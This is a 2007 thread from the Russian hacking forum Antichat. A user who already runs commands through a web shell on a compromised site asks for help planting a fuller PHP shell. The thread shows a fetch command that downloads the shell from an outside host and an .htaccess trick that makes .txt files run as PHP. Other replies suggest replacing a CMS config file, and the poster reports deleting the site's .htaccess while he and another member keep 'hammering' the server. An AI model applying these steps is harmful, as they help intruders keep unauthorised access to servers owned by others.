Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   *nix (https://forum.antichat.xyz/forumdisplay.php?f=43)
-   -   Проблемы с заливкой шелла (https://forum.antichat.xyz/showthread.php?t=45461)

_-Ramos-_ 27.07.2007 15:29
Проблемы с заливкой шелла
 
Тут такая проблема :
есть шелл site/qwerty.cgi?= , где я после = могу выполнять команды. Я хочу залить более удобный шелл . На сервер можна заливать файлы через fetch.
При выполнении
Цитата:
fetch -o /kyda/zalivaem/shell.php http://site.com/shell.txt
шелл заливается на сервер (в этом я убедился командой ls -al и cat /kyda/zalivaem/shell.php мне выдает исходники шелла), но когда я захожу на ссылку шелла,
то мне выдает ошибку 404 .

как мне залить шелл на сайт ???

P.S: извиняюсь если создал тему не у том розделе

andy13 27.07.2007 15:36
в другие каталоги заливать пробовал?

_-Ramos-_ 27.07.2007 15:38
для заливки в другие каталоги недостаточно прав

andy13 27.07.2007 15:49
В каталоге, куда заливаешь, есть другие файлы? С каким расширением?
При попытке их посмотреть тоже 404?
Если нет, попробуй так:
cp shell.php shell.txt
и создай .htaccess такого содержания:
AddType application/x-httpd-php .txt

Alexsize 27.07.2007 15:50
Напиши в ПМ. Попробуем разрулить.

groundhog 27.07.2007 15:56
Посмотри на права, какие получаются у шелла после заливки с урлы... Нету прав на выполнение скорее всего... Возможно хитро настроен mod_rewrite...

_-Ramos-_ 27.07.2007 15:59
В каталоге есть еще файлы с расширением .cgi и при их просмотре выдаетс тоже ошибка 404

andy13 27.07.2007 16:24
Код:
#!/path_to_perl/perl
print "Content-type: text/plain\n\n";
print "hello!";
сохраняй как hello.cgi
chmod 755 hello.cgi
На такое тоже ругается?

Talisman 27.07.2007 16:44
там есть файлы типа .htaccess? в предыдущих дирах? посмотри внимательнее в них.
как насчет модификации уже существующих файлов?

Например, у меня прокатывал такой вариант:
самописная ЦМС инклудила файл конфига. я его скопировал с именем config_.php
затем config.php с правильными правами на исполнение переименовал в другое имя и переписал. переименовав config_.php в оригинальный. инклудился он нормально, но вот уже не исполнялся так же как новосозданные файлы :)
Кста, кто знает, что там за система была заюзана?

Alexsize 27.07.2007 16:45
Короче тему можно закрывать. Сайт, на который удалось влить шелл не виден из веба. На остальных сайтах сервака нет прав доступа для заливки шелла.

_-Ramos-_ 27.07.2007 17:12
Туму пока не закрывайте
Я с Alexsize пока долбим сервак

------------------------------------------
Тут такая фигня блин
на сервере 2 сайта
на 1 недостаточно прав для заливки шелла
на 2 есть две папки в которые разришена запись
,но если или в первую или во вторую залить шелл и перейти по ссылке на шелл то будет ошибка 404

_-Ramos-_ 27.07.2007 19:01
Цитата:
Сообщение от Talisman
там есть файлы типа .htaccess? в предыдущих дирах? посмотри внимательнее в них.
как насчет модификации уже существующих файлов?
да там был файл .htaccess , но я его удалил !
В папке остался только один файл .svn это я думаю он мне и мешает , но у меня нет прав его удалить

groundhog 27.07.2007 19:29
Он тебе не может мешать, хотя бы потому, что несёт в себе только информацию о версиях файлов... То есть svn это аналог cvs - системы контроля версий... Короче, админ держит файло веб-сервака в svn, чтобы ресурс был наиболее актуален... Так что забей, svn тебе точно не мешает... Он даже не воспринимается веб-сервером...


Время: 22:12